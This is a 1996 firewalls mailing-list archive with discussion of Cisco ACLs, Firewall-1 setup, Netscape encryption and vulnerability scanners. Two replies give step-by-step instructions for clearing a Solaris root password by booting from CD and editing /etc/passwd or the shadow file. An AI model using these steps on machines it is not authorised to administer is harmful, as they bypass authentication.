Use of certificates has to be configured. Again, session hijacking is not a problem with SSL; DNS spoofs are preventable with server certificates. I do not know of a good solution for the PC host security problem. And its is growing daily. Java, ActiveX, plug-ins, shareware, data-born viruses, self-starting CD-rom software.... I would like a B2 Windows NT. The Java VM actually has some promise of helping here if they can ever get the implementation tight. But if the OS could effectively encapsulate applications, then the browser and downloadable programs would be safe to run (Java VM included). My worries are: 1) People will put too much trust in encryption without strong authentication aka SSL w/o certificates. 2) Hackers will begin to target the home PC via trojan horses in downloadable content. 3) The PC host security problem will be ignored until internet commerce functionality is seriously overhanging its security foundation. Problem #2 really bothers me. In some ways I feel safer with hackers reading my every packet rather than _forcing_ them to attack at my PC or Server or other end-point of encryption. Guess I'm paranoid. (But people really are following me!) Mark Riggins Secure Systems Engineering AT&T Bell Labs From firewalls-owner Wed Jul 17 11:18:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA06229 for firewalls-outgoing; Wed, 17 Jul 1996 10:18:18 -0700 (PDT) Received: from poseidon ([200.10.251.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA06216 for ; Wed, 17 Jul 1996 10:18:08 -0700 (PDT) Received: from [146.21.1.236] by poseidon (AIX 3.2/UCB 5.64/4.03) Message-Id: <1.5.4.16.19960717171609.235f2d9c@sii.cl> X-Sender: qsherman@sii.cl X-Mailer: Windows Eudora Light Version 1.5.4 (16) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 17 Jul 1996 13:16:09 -0400 To: firewalls@greatcircle.com From: Quentin Sherman Subject: Re: Cisco ACL's Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Howdy > >can someone here please help me out with the following: > >I have a cisco4k with 2 serial ports, one ether. > >eth0 is Lan A >ser0 is Lan B >ser1 is the Internet line > >I want everyone on Lan A to be able to acess Lan B, and >everyone on Lan B to be able to access Lan A. (all ports) > >Secondly, I want the Internet server (proxy, etc) on Lan >A a.b.c.15 to be able to access any machine on the Internet, >and any machine on the Internet to access it. > >What do I need to do to the following access lists to make >the above work? > >! allow Lan A access to Lan B >access-list permit a.b.c.0 255.255.255.0 a.b.d.0 255.255.255.0 >! allow Lan B access to Lan A >access-list permit a.b.d.0 255.255.255.0 a.b.c.0 255.255.255.0 >! allow sun1 (Internet server) access to Internet >access-list permit a.b.c.15 255.255.255.? 0.0.0.0 0.0.0.0 >! allow Internet access to sun1 >access-list permit 0.0.0.0 0.0.0.0 a.b.c.15 255.255.255.? >! deny everything else >access-list deny 0.0.0.0 0.0.0.0 0.0.0.0 0.0.0.0 > First, you need to check the software version of your cisco router, I'm not sure all version can supports the filter function. Second, in my personal opinion, it's just a little bit danger to use *one* router to connect your internal network and Internet. Third, when you build a filter (access-list), there is no *network mask* (sometime is called subnet mask) something like "255.255.255.0". They called "source wildcard bits", so, the access-list you defined should be: ! allow Lan A access to Lan B access-list permit ip a.b.c.0 0.0.0.255 a.b.d.0 0.0.0.255 ! allow Lan B access to Lan A access-list permit a.b.d.0 0.0.0.255 a.b.c.0 0.0.0.255 Just take a look from the ftp://ftp.greatcircle.com/pub/FAQ, I think that will be helpful to you. They got a sample filter there. Fourth, if you want to get higher security to your internet host, you need to build some more filter to deny some special ports from the outside such as telnet, etc. Finally, you should build another filter to deny any access to your router from the outside (internet), therefore, you can be sure that nonone can change the configuration of your router from the outside. Here is an example: ! allow all stations in Lan A to access the router access-list 1 permit a.b.c.0 0.0.0.255 If you have any other questions, please let me know. ------------------------------------------------------------- Quentin Sherman (Qi Xue) Network & Security Consultant Servicio de Impuestos Internos Working Phon: 56-2 6921371 Teatinos 120, Santiago, Chile Working Fax: 56-2 6921501 e-mail: qsherman@sii.cl WWW: http://www.sii.cl ------------------------------------------------------------- From firewalls-owner Wed Jul 17 11:37:34 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA11443 for firewalls-outgoing; Wed, 17 Jul 1996 11:05:29 -0700 (PDT) Received: from hidata.com (hidata.com [205.158.61.34]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA11424 for ; Wed, 17 Jul 1996 11:05:22 -0700 (PDT) Received: by hidata.com; id AA06762; Wed, 17 Jul 96 11:02:21 PDT Received: from osc.hidata.com(205.158.62.10) by hds-gw.hidata.com via smap (V3.1.1) Received: from enterprise by osc.osc.hidata.com (SMI-8.6/SMI-SVR4) Date: Wed, 17 Jul 1996 11:01:54 -0700 Message-Id: <199607171801.LAA22442@osc.osc.hidata.com> X-Sender: bstout@osc.hidata.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Firewalls@GreatCircle.COM From: Bill Stout Subject: RC4-128bit encryption for Netscape available Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You all probably know this by now, but yesterday Netscape announced availability of downloadable RC4-128bit encryption Server and Browser products to U.S. customers. http://www.netscape.com/ Bill <=======10========20========30========40========50========60========70========80 William B. Stout | Major revelations: Senior Systems Admin | "All objects are part of a larger object." Hitachi Data Systems | "3 aware beings comprise a person; mind, body, spirit." NT/UNIX/I-net/Routers | "The secret of life: To be involved with 'creation'." 408-970-4822 | Infowar, Cyber-war, yes, 'they' are out to get you... -------------------------------------------------------------------------------- From firewalls-owner Wed Jul 17 11:45:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA10029 for firewalls-outgoing; Wed, 17 Jul 1996 10:52:45 -0700 (PDT) Received: from dfw-ix5.ix.netcom.com (dfw-ix5.ix.netcom.com [206.214.98.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA09701 for ; Wed, 17 Jul 1996 10:51:41 -0700 (PDT) Received: from EarlEvans.medicalogic.com ([198.107.237.35]) by dfw-ix5.ix.netcom.com (8.6.13/8.6.12) with SMTP id KAA15381 for ; Wed, 17 Jul 1996 10:48:31 -0700 Message-ID: <31ED27C9.4A4D@ix.netcom.com> Date: Wed, 17 Jul 1996 10:50:01 -0700 From: Earl Evans Reply-To: e_evans@ix.netcom.com X-Mailer: Mozilla 3.0b5Gold (Win95; I) MIME-Version: 1.0 To: firewalls@greatcircle.com Subject: FW-1: Network Object Definition Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everybody, I am trying to figure out how to define some basic network objects on Firewall-1. I've read the manually thoroughly and am still confused. Perhaps some kind soul can give me a hand. My internal network is 10.x.x.x (unregistered, IANA recommendation), and is composed of a collection of subnets connected to a backbone. One of the interfaces of my Firewall-1 box will be connected to this backbone. The other interface of the FW-1 box will be connected to my DMZ, which is then routed to the Internet. My intent is to use NAT to translate the internal addresses to valid ones on the DMZ. I believe this is a fairly straightforward and common setup. I would like to create network objects which represent the internal net and the Internet so that I can proceed with entering rules in the Rule Base. My problem is understanding the specific FW-1 mechanics used to define these objects. Some specific issues: When defining a network object, the dialog box asks for a particular IP address. This is odd, because IP networks are generally designated x.y.z.0 (I'm assuming class C in this example), where x.y.z is the network portion and .0 represents the network. There is a space for the subnet mask in the dialog box...can I assume that the host portion of the address is ignored and that any host on the resultant net matches that object? Although I've used class C subnetting on the internal internetwork (multiple nets, 10.x.y.z netmask 255.255.255.0), could I use a broader mask in the FW-1 network object to represent the whole internal network - i.e., 10.x.y.z netmask 255.0.0.0? Would this work, or would I be confusing the system. Lastly, based on what the manual did contain, I'm thinking the way to represent the Internet is to first define the internal net and then use the negate feature to designate "everything else". Is this accurate? Any insight would be greatly appreciated, including the mechanics of the process. Thanks and Regards, Earl Evans -- [][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] Earl Evans "I thought, [] [] e_evans@ix.netcom.com therefore I was" [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Wed Jul 17 12:23:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA19728 for firewalls-outgoing; Wed, 17 Jul 1996 11:57:44 -0700 (PDT) Received: from mail.isis.co.za ([196.28.23.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA19702 for ; Wed, 17 Jul 1996 11:57:36 -0700 (PDT) Received: from apds-yr (yr1.isis.co.za [196.28.22.36]) by mail.isis.co.za (8.6.12/8.6.9) with SMTP id UAA19084; Wed, 17 Jul 1996 20:49:37 +0200 Message-ID: <31ED36D5.3127@isis.co.za> Date: Wed, 17 Jul 1996 20:54:13 +0200 From: Itsik Rubin Organization: Isis (Pty) Ltd X-Mailer: Mozilla 2.01 (WinNT; I) MIME-Version: 1.0 To: alexf@iss.net CC: firewalls@GreatCircle.COM Subject: Satan like utilities for Windows-NT References: <199607171512.LAA03336@phoenix.iss.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Are there any Satan-like utilities that run under Windows-NT? Any plans for the future? Thanks Itsik From firewalls-owner Wed Jul 17 12:41:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA18138 for firewalls-outgoing; Wed, 17 Jul 1996 11:47:01 -0700 (PDT) Received: from ivac2arpa.ivac.com (ivac.ivac.com [206.216.182.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA18094 for ; Wed, 17 Jul 1996 11:46:47 -0700 (PDT) Received: from auspex (auspex-e1.ivac.com [204.193.38.65]) by ivac2arpa.ivac.com (8.7.5/8.7.3) with SMTP id LAA06617 for ; Wed, 17 Jul 1996 11:43:44 -0700 (PDT) Received: from ivac35.ivac_eng by auspex (4.1/SMI-4.1) Date: Wed, 17 Jul 96 11:43:26 PDT From: dengland@ivac.com (Dave England) Message-Id: <9607171843.AA24590@auspex> To: firewalls@greatcircle.com Subject: Security issues with Web server on firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Other than the cgi ramifications is the CERN HTTP server secure as my outside Web server if run on a firewall proxy? If not, what are the potential risks that I need to consider? thanks - and I'll summarize. From firewalls-owner Wed Jul 17 12:52:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA19967 for firewalls-outgoing; Wed, 17 Jul 1996 11:59:29 -0700 (PDT) Received: from SantaClara01.pop.internex.net (SantaClara01.POP.InterNex.Net [205.158.3.18]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA19873 for ; Wed, 17 Jul 1996 11:59:01 -0700 (PDT) Received: from claunch.hdshq.com ([206.215.16.130]) Received: from vogelesang.hdshq.com (ian.hdshq.com [199.228.179.29]) by claunch.hdshq.com (1/HDS MAIL SYSTEM) with SMTP id JAA13488; Wed, 17 Jul 1996 09:21:53 -0700 (PDT) Message-ID: <31ED14CB.6D69@hdshq.com> Date: Wed, 17 Jul 1996 09:28:59 -0700 From: "A. Ian Vogelesang" Organization: Hitachi Data Systems X-Mailer: Mozilla 2.02 (Win95; U) MIME-Version: 1.0 Newsgroups: comp.security.unix,comp.mail.sendmail To: firewalls@greatcircle.com, qpopper@qualcomm.com, cert@cert.org Subject: Patch removes POP3 users from /etc/passwd Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Modifications to Sendmail, local delivery, popper, and poppassd have been developed to move POP3 users out of /etc/passwd, and to run local delivery and popper retrieval under a no-priviledge uid. Details at: http://www.hdshq.com/fixes/mail_patch A. Ian Vogelesang From firewalls-owner Wed Jul 17 13:18:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA28807 for firewalls-outgoing; Wed, 17 Jul 1996 13:14:38 -0700 (PDT) Received: from absolut-zero.winternet.com ([198.174.169.4]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id NAA28778 for ; Wed, 17 Jul 1996 13:14:27 -0700 (PDT) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by absolut-zero.winternet.com (8.7.5/8.7.5) with ESMTP id PAA05134; Wed, 17 Jul 1996 15:11:22 -0500 (CDT) Received: (from dufresne@localhost) by parka (8.7.4/8.6.12) id PAA28323; Wed, 17 Jul 1996 15:11:21 -0500 (CDT) Posted-Date: Wed, 17 Jul 1996 15:11:21 -0500 (CDT) Date: Wed, 17 Jul 1996 15:11:20 -0500 (CDT) From: Ron DuFresne To: Bill Stout cc: Firewalls@GreatCircle.COM Subject: Re: RC4-128bit encryption for Netscape available In-Reply-To: <199607171801.LAA22442@osc.osc.hidata.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 17 Jul 1996, Bill Stout wrote: > You all probably know this by now, but yesterday Netscape announced > availability of downloadable RC4-128bit encryption Server and Browser > products to U.S. customers. > > http://www.netscape.com/ > Yes, but as of about 20 mins ago, the download process for these products was not functioning... Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Wed Jul 17 14:23:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA04597 for firewalls-outgoing; Wed, 17 Jul 1996 14:15:59 -0700 (PDT) Received: from phoenix.iss.net (phoenix.iss.net [204.241.60.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id OAA04590 for ; Wed, 17 Jul 1996 14:15:51 -0700 (PDT) Received: from alexf.iss.net (alexf.iss.net [204.241.60.153]) by phoenix.iss.net (8.6.13/8.6.12) with SMTP id RAA08900; Wed, 17 Jul 1996 17:12:25 -0400 Message-Id: <199607172112.RAA08900@phoenix.iss.net> Comments: Authenticated sender is From: "Alex F" Organization: Internet Security Systems, Inc. To: alexf@iss.net, Itsik Rubin Date: Wed, 17 Jul 1996 17:13:38 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Satan like utilities for Windows-NT Reply-to: alexf@iss.net CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Win32 (v2.32a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Are there any Satan-like utilities that run under > Windows-NT? > > Any plans for the future? > The ISS Scanner is currently being ported to NT. The release date is slated for 8/1, but we all know how that stuff goes.... Go to our website's download area and click on NT. You'll be prompted to sign up for the ntscanner list (list for announcements, etc), or send email to majordomo@iss.net with the message subscribe ntscanner in the body of the message. Thanks, Alex F =-=-=-=-=-=-=-=-=-=-=-=-=- Alex F alexf@iss.net Marketing Specialist Internet Security Systems =-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Wed Jul 17 14:48:28 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA06513 for firewalls-outgoing; Wed, 17 Jul 1996 14:44:17 -0700 (PDT) Received: from hades.wvs.com (hades.wvs.com [204.247.81.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id OAA06496 for ; Wed, 17 Jul 1996 14:44:09 -0700 (PDT) Received: from jupiter.wvs.com (jupiter.wvs.com [204.247.80.32]) by hades.wvs.com (8.7.4/8.7.3) with ESMTP id OAA00375; Wed, 17 Jul 1996 14:40:45 -0700 (PDT) Received: (from dwg@localhost) by jupiter.wvs.com (8.7.4/8.7.3) id OAA17842; Wed, 17 Jul 1996 14:40:43 -0700 (PDT) Date: Wed, 17 Jul 1996 14:40:42 -0700 (PDT) From: David W Grimsby To: "Steven C. Payne" cc: Stefan Berg , firewalls@GreatCircle.COM Subject: Re: [HELP] I lost root password! In-Reply-To: <9607171213.AA09135@dsacg1.dsac.dla.mil> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "boot cdrom -s" is easier than going through the install procedure. dwg On Wed, 17 Jul 1996, Steven C. Payne wrote: > > > > > Hello, > > > This is an very emergency state to me! > > > Someone broken my root password! and make it worse file system > > > is crashing now! > > > > > > I use solaris 2.4, when i used sun os 4.1.3 i can modify root password > > > by single user mode booting.. > > > But whenever I try, it asking me root password.. > > > > > > Could you help me with this problem? How can I re-obtain root password? > > > I know my asking for help is not suitable this mailing list. but > > > nobody can help me.. > > > > > > Anyway, tkank you in advance.. > > > boot the machine with the cdrom, or over the net, go through > the install procedures, mount the /root file system, > modify the shadow file and reboot. > > this IS documented in the OS docs. > spayne > From firewalls-owner Wed Jul 17 18:48:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA17242 for firewalls-outgoing; Wed, 17 Jul 1996 18:43:24 -0700 (PDT) Received: from smtp1.interramp.com (smtp1.interramp.com [38.8.45.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA17234 for ; Wed, 17 Jul 1996 18:43:19 -0700 (PDT) Received: from starfury.predictive.com by smtp1.interramp.com (8.6.12/SMI-4.1.3-PSI-irsmtp) Message-Id: <2.2.32.19960718014011.006bed84@204.243.240.5> X-Sender: starfury@204.243.240.5 X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 17 Jul 1996 21:40:11 -0400 To: firewalls@greatcircle.com From: PCA Subject: CCMAIL MOBILE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All, The client I was working for was trying to use CCMAIL Mobile externally to pickup their email from their internal CCROUTER box. Unfortunately CCMAIL Mobile uses tcp port 21 to transmit the email files to the client software but it doesn;t use ftp commands to accomplish this. Hence on the Raptor Eagle 3.1 you can't force the generic service passer to accept trasparent port 21 or proxyd to do this either. Since port 21 has always been associated with ftp, it is inbred that the Raptor will no matter what always try accept ONLY ftp connections on port 21 and not anything else. Has anyone encountered this? And yes I know Lotus screwed up big time by illegally using port 21 but my client who has a major installed base of CCMAIL is at an impasse. Thanks for any info you have. -- ============================== Predictive Systems Inc. || Managed Network Services Division || -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ NARF, POIT!!! Senior Systems Engineer || P.C. Aviles || (212) 219-4400 // (201) 408-9088 || ============================== From firewalls-owner Wed Jul 17 19:18:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA18404 for firewalls-outgoing; Wed, 17 Jul 1996 19:03:59 -0700 (PDT) Received: from server.webmaster.com (server.webmaster.com [204.156.143.129]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA18394 for ; Wed, 17 Jul 1996 19:03:48 -0700 (PDT) Received: from avi.webmaster.com ([204.156.143.139]) Message-Id: <2.2.32.19960717232043.006fd278@server.webmaster.com> X-Sender: updates@server.webmaster.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Wed, 17 Jul 1996 16:20:43 -0700 To: kkm@xkis.nnov.su, v-kenma@microsoft.com, alexshaw@msn.com From: "WebMaster UPDATE" Subject: ANNOUNCE: ConferenceRoom 1.1 Release Cc: mark, mike, pete, conklin@emf.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk WebMaster Update ---------------------------------------------------------------------------- -------------------- This is a Product Announcement. We apologize for the inconvenience. We understand that this may offend some members, but think that this information may be of interest to the list. ---------------------------------------------------------------------------- -------------------- WEBMASTER RELEASES CONFERENCEROOM 1.1, THE FIRST FULLY FUNCTIONAL INTERNET RELAY CHAT (IRC) SERVER FOR WINDOWS NT AND 95. "iNTERaCTIVATE yOUR wEB sITE" Download your FREE EVALUATION today at http://www.webmaster.com/frames/products/conferenceroom/cr-download.html Key Features: 1. Tightly integrated with the web. Built in web interface server. Can interact with any Java-enabled browser. Allows user browser to become a chat client. For a demonstration, check out the Cafe at http://irc.webmaster.com/frames/webstrands/cafe/=20 ConferenceRoom's chat client uses Java to provide a feature-rich and smooth experience that previously could only be found on the proprietary interfaces of CompuServe and America On-Line. 2. Easy administration. Take the pain away from chat serving. Easy Windows interface. 3. Built for Windows NT. High performance. Can also run on Windows 95. 4. It is ideal for those who need to deploy internal company networks, often called Intranets, as well as those who wish to connect to the Internet. 5. Or for those who want to form a virtual fly-fishing group. 6. Deployment is especially easy because ConferenceRoom communicates with UNIX=AE IRC Servers -- the only Windows NT=AE IRC server with this= capability. =20 7. RFC 1459 and IRCD compatible. 8. ConferenceRoom is compatible with IRC networks. To connect to newly formed IRC networks, please E-Mail soil@webmaster.com. Best Regards, WebMaster Incorporated Note: To remove yourself from this list, please E-Mail= updates@webmaster.com. =20 WebMaster Incorporated Copyright =AE 1995, 1996 WebMaster Incorporated. May not be reproduced in whole or in part without express consent of WebMaster Incorporated.=20 From firewalls-owner Wed Jul 17 19:51:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA21981 for firewalls-outgoing; Wed, 17 Jul 1996 19:43:33 -0700 (PDT) Received: from relay.tis.com (ns.tis.com [192.94.214.100]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id TAA21974 for ; Wed, 17 Jul 1996 19:43:26 -0700 (PDT) Received: by relay.tis.com; id WAA07686; Wed, 17 Jul 1996 22:37:55 -0400 Received: from unknown(192.94.214.124) by relay.tis.com via smap (V3.1.1) Message-Id: <2.2.32.19960718023832.0069b6f0@popsrvr.tis.com> X-Sender: eroraha@popsrvr.tis.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 17 Jul 1996 22:38:32 -0400 To: firewalls@greatcircle.com From: Inno Eroraha Subject: Network Security tools Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am interested in finding out about different firewalls and the network/authentication protocols that they support. Can anyone point me to a site where to find this information without wading through the voluminous literatures of the different firewall vendors? Also, I am interested in finding out if there is an Internet vulnerability scanner (similar to Satan or ISS) but runs on Windows 95 platform. Are you familiar with a site or a tool that may be of use? I want to be able to use this tool to probe any given host (whether UNIX machine or otherwise) to access the vulnerability of the system. Thanks while I wait "impatiently" to hear from you! -0- inno From firewalls-owner Wed Jul 17 20:03:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA22968 for firewalls-outgoing; Wed, 17 Jul 1996 19:56:40 -0700 (PDT) Received: from dollar.firstpac.com.au (firstpac.com.au [203.61.7.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id TAA22932 for ; Wed, 17 Jul 1996 19:56:26 -0700 (PDT) Received: from shekel.firstpac.com.au (shekel [203.61.14.12]) by dollar.firstpac.com.au (8.7.5/firstpac/0.99) with ESMTP id MAA06704; Thu, 18 Jul 1996 12:50:47 +1000 (EST) Received: (from matt@localhost) by shekel.firstpac.com.au (8.7.2/8.7.2/firstpac) id MAA05664; Thu, 18 Jul 1996 12:53:31 +1000 (EST) Message-Id: <199607180253.MAA05664@shekel.firstpac.com.au> Subject: Re: RC4-128bit encryption for Netscape available To: dufresne@winternet.com (Ron DuFresne) Date: Thu, 18 Jul 1996 12:53:29 +1000 (EST) Cc: bill.stout@hidata.com, Firewalls@GreatCircle.COM In-Reply-To: from "Ron DuFresne" at Jul 17, 96 03:11:20 pm X-Ph: ph: +61 2 394 4320 fax: +61 2 394 4398 home: +61 2 9929 0717 X-Pgp: pub 2047/DFA91FA1 1996/05/01 Matthew Keenan X-Pgp: Key fingerprint = 36 09 88 84 FA 11 82 82 D7 E7 B8 23 6E B0 22 BB From: Matthew Keenan X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ron DuFresne wrote this... > On Wed, 17 Jul 1996, Bill Stout wrote: >> You all probably know this by now, but yesterday Netscape announced >> availability of downloadable RC4-128bit encryption Server and Browser >> products to U.S. customers. >> http://www.netscape.com/ > Yes, but as of about 20 mins ago, the download process for these products > was not functioning... i wonder how secure it is? i know it checks street addresses and the like, but couldnt this be faked? also how does the (i assume) ftp server know that you are valid? or does it download via http? Matt -- Matthew Keenan Network Administrator First Pacific Stockbrokers Sydney, Australia From firewalls-owner Wed Jul 17 21:33:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id VAA28850 for firewalls-outgoing; Wed, 17 Jul 1996 21:21:53 -0700 (PDT) Received: from pinky.junction.net (pinky.junction.net [199.166.227.12]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id VAA28836 for ; Wed, 17 Jul 1996 21:21:47 -0700 (PDT) Received: from sidhe.memra.com (sidhe.memra.com [199.166.227.105]) by pinky.junction.net (8.6.12/8.6.12) with ESMTP id UAA26187 for ; Wed, 17 Jul 1996 20:29:32 -0700 Received: from localhost (michael@localhost) by sidhe.memra.com (8.6.12/8.6.12) with SMTP id VAA02377 for ; Wed, 17 Jul 1996 21:14:02 -0700 Date: Wed, 17 Jul 1996 21:14:00 -0700 (PDT) From: Michael Dillon To: firewalls@GreatCircle.COM Subject: More hacker info from Forbes In-Reply-To: <2.2.32.19960718014011.006bed84@204.243.240.5> Message-ID: Organization: Memra Software Inc. - Internet consulting MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anybody read this Forbes article? http://www.forbes.com/asap/6396/hack.htm It might be a real eye-opener... Michael Dillon - ISP & Internet Consulting Memra Software Inc. - Fax: +1-604-546-3049 http://www.memra.com - E-mail: michael@memra.com From firewalls-owner Thu Jul 18 02:48:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id CAA10571 for firewalls-outgoing; Thu, 18 Jul 1996 02:36:00 -0700 (PDT) Received: from dicsmss1.jrc.it (dicsmss1.jrc.it [139.191.1.65]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id CAA10556 for ; Thu, 18 Jul 1996 02:35:47 -0700 (PDT) Received: from ceo0912.jrc.it by dicsmss1.jrc.it (4.1/EB-950131-C) Received: by ceo0912.jrc.it (SMI-8.6/SMI-SVR4) Date: Thu, 18 Jul 1996 11:32:11 +0200 From: peter.maersk-moller@jrc.it (Peter Maersk-Moller) Message-Id: <199607180932.LAA02362@ceo0912.jrc.it> To: updates@webmaster.com Subject: Re: ANNOUNCE: ConferenceRoom 1.1 Release Cc: firewalls@Greatcircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Md5: 2foQf8TDA4bQwxrRrXjMrQ== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk How many useless MB of mail and denial of services do you want in reply to you commercial junk. One line of mail would have been more appropriate. Something like "New release of xxxxxx. Info can be found on http://xxxxx". I wont spam you this time, but next i'll do. Peter From firewalls-owner Thu Jul 18 04:33:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id EAA14416 for firewalls-outgoing; Thu, 18 Jul 1996 04:28:05 -0700 (PDT) Received: from daneel-internal.medcom.se (ns.medcom.se [194.213.80.20]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id EAA14403 for ; Thu, 18 Jul 1996 04:27:53 -0700 (PDT) Received: by daneel-internal.medcom.se; id NAA28978; Thu, 18 Jul 1996 13:26:23 +0200 Received: from panpc.medcom.se(194.16.52.110) by daneel.medcom.se via smap (V3.1.1) Message-ID: <31EE2C08.2CCA@medcom.se> Date: Thu, 18 Jul 1996 13:20:24 +0100 From: P=?iso-8859-1?Q?=E4r Ahr=E9?=n Reply-To: pera@medcom.se Organization: Media Communications Eur AB X-Mailer: Mozilla 3.0b5a (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: RE: [HELP] I lost root password! Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Date: Wed, 17 Jul 1996 18:10:22 +1000 >From: Juyoung Park >Subject: [HELP] I lost root password! > >Hello, >This is an very emergency state to me! >Someone broken my root password! and make it worse file system is >cras= hing now! > >I use solaris 2.4, when i used sun os 4.1.3 i can modify root password >= by >single user mode booting.. >But whenever I try, it asking me root password.. > >Could you help me with this problem? How can I re-obtain root password? >I know my asking for help is not suitable this mailing list. but nobody = >can >help me.. > >Anyway, tkank you in advance.. What I did was (if I can remember it right :-) disconnect the machine from the net! a) First log in as a normal user and check the mount point for /etc (its the / partition I think) b) Turn the power off (You can't do a clean halt whithout the root password) c) boot from the install CD (or tape) and press ctrl+c to get a shell d) mount the disk to (the one in _a_) /tmp or some other directory thas empty e) edit to /etc/passwd file and remove the root password f) turn off the power or halt g) boot from the disk h) login as root no password i) change the root password DONE! -- = P=E4r Ahr=E9n, Technical Consultant Media Communications Eur AB (publ) Phone: +46(0)8 21 77 88 Fax: +46(0)8 21 95 05 Mobile: +46(0)708 76 01 30 Video: +46(0)8 440 22 55 (H.320) E-Mail: pera@medcom.se Web: http://www.medcom.se/pera From firewalls-owner Thu Jul 18 05:18:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id FAA16293 for firewalls-outgoing; Thu, 18 Jul 1996 05:02:25 -0700 (PDT) Received: from Grosses-Raetsel-Tor.GeNUA.DE 